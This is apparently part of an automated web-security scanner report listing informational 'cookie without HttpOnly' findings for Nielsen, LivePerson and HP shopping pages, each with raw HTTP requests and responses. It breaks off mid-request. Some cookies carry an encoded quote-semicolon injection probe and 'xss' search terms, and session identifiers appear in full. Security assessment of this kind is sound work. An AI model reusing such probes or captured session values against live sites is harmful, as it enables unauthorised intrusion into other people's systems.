Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:01:35 GMT
ETag: "e78093-e37-4ad7b8ec991c0"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 3639

/*
* This javascript function is to build the top navigation component
* on the page.
* The dropdownmenu function creates the second level dropdown menu option
* The showhide function is used to
...[SNIP]...

4.50. http://nielsen.com/etc/designs/corporate/static/js/nielsenJs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/static/js/nielsenJs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/static/js/nielsenJs.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:54 GMT
ETag: "e7803e-b69-4ad7b8c57f580"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 2921

function addLoadEvent(func) {
var oldonload = window.onload;
if (typeof window.onload != 'function') {
window.onload = func;
} else {
window.onload = function()
...[SNIP]...

4.51. http://nielsen.com/etc/designs/corporate/topnav.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/topnav.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/topnav.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:52 GMT
ETag: "e78025-b3b-4ad7b8c397100"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 2875


/******************************************************************************/
/* topnav
/******************************************************************************/
#nav {
background: url
...[SNIP]...

4.52. http://nielsen.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: nielsen.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 404 Not Found
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:19:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 28976


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8
...[SNIP]...

4.53. http://nielsen.com/libs/cq/personalization/components/clickstreamcloud/content/config.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /libs/cq/personalization/components/clickstreamcloud/content/config.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /libs/cq/personalization/components/clickstreamcloud/content/config.json?path=%2Fus%2Fen%2Fmeasurement%2Fonline-measurement&cq_ck=1316711871094 HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Length: 2107
Content-Type: application/json;charset=utf-8

{
"data": {
"profile": {
"avatar": "/etc/designs/default/images/collab/avatar.png",
"authorizableId": "anonymous",
"authorizableId_xss": "anonymous",
"formattedName": "",
...[SNIP]...

4.54. http://nielsen.com/us/en/insights/press-room/2008/nielsen_reports_tv.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /us/en/insights/press-room/2008/nielsen_reports_tv.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/en/insights/press-room/2008/nielsen_reports_tv.html HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/content/corporate/us/en/search.html?q=mobile+tv+internet
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.4.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3Dmobile%20tv%20internet%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7CTAGCLOUD%3A%3D%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3937166166; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Accept-Ranges: bytes
Content-Type: text/html
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 49622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...

4.55. http://nielsen.com/us/en/measurement/online-measurement.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /us/en/measurement/online-measurement.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/en/measurement/online-measurement.html HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nielsen-online.com/intlpage.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Accept-Ranges: bytes
Content-Type: text/html
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 53496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...

4.56. http://nielsen.com/us/en/measurement/television-measurement.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /us/en/measurement/television-measurement.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/en/measurement/television-measurement.html HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Accept-Ranges: bytes
Content-Type: text/html
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 50327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...

4.57. http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /us/en/practices/cross-platform-audience-behavior.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/en/practices/cross-platform-audience-behavior.html HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/measurement/television-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.2.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Accept-Ranges: bytes
Content-Type: text/html
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 50463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...

4.58. http://sales.liveperson.net/hc/9551721/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/9551721/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: HumanClickSiteContainerID_9551721. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/9551721/?&site=9551721&cmd=mTagKnockPage&lpCallId=409443714656-583066007820&protV=20&lpjson=1&id=9607976011&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-bcs%7Cnull%7ClpChatDynamicChatButtonDiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.backcountry.com/store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=BCS0021-BCSGC125-ONSI&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=55&y=10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:11:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 22 Sep 2011 12:11:59 GMT
Set-Cookie: HumanClickSiteContainerID_9551721=STANDALONE; path=/hc/9551721
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31272

lpConnLib.Process({"ResultSet": {"lpCallId":"409443714656-583066007820","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

4.59. http://www.shopping.hp.com/design

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /design

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: hpcompc_usen. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_accessories HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; hpcompc_usen=cartExists=true; HP_EBUS=true; HP_EBUS_HP_CLICKS=4x19x11121; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Astatic%25253Atouchpadfaqs%2526pidt%253D1%2526oid%253D%25252Fdesign_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_accessories_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 148298

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

4.60. http://www.shopping.hp.com/desktops

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /desktops

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: hpshopping, hpcompc_usen. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; hpshopping=1&user_id=mlkpjNmR0Qt%2BNyntuVfacgSd0ic%3D; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9ye0A55NS%2FpuVTbcgSelmvi; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 208060


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4.61. http://www.shopping.hp.com/esp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /esp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: hpshopping, hpcompc_usen. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=3; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Acs%3Adesktops; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkpiNuW0Ql6Oijjs1beeACYlmvi; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=2x2x8

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpgt2U3wN6NSvrvlHYdgad0ic%3D; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 167900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4.62. http://www.shopping.hp.com/go/microsoftoffers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /go/microsoftoffers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/microsoftoffers?jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/3/dt_promo_tile3_buy_a_pc_and_get_an_xbox_526 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
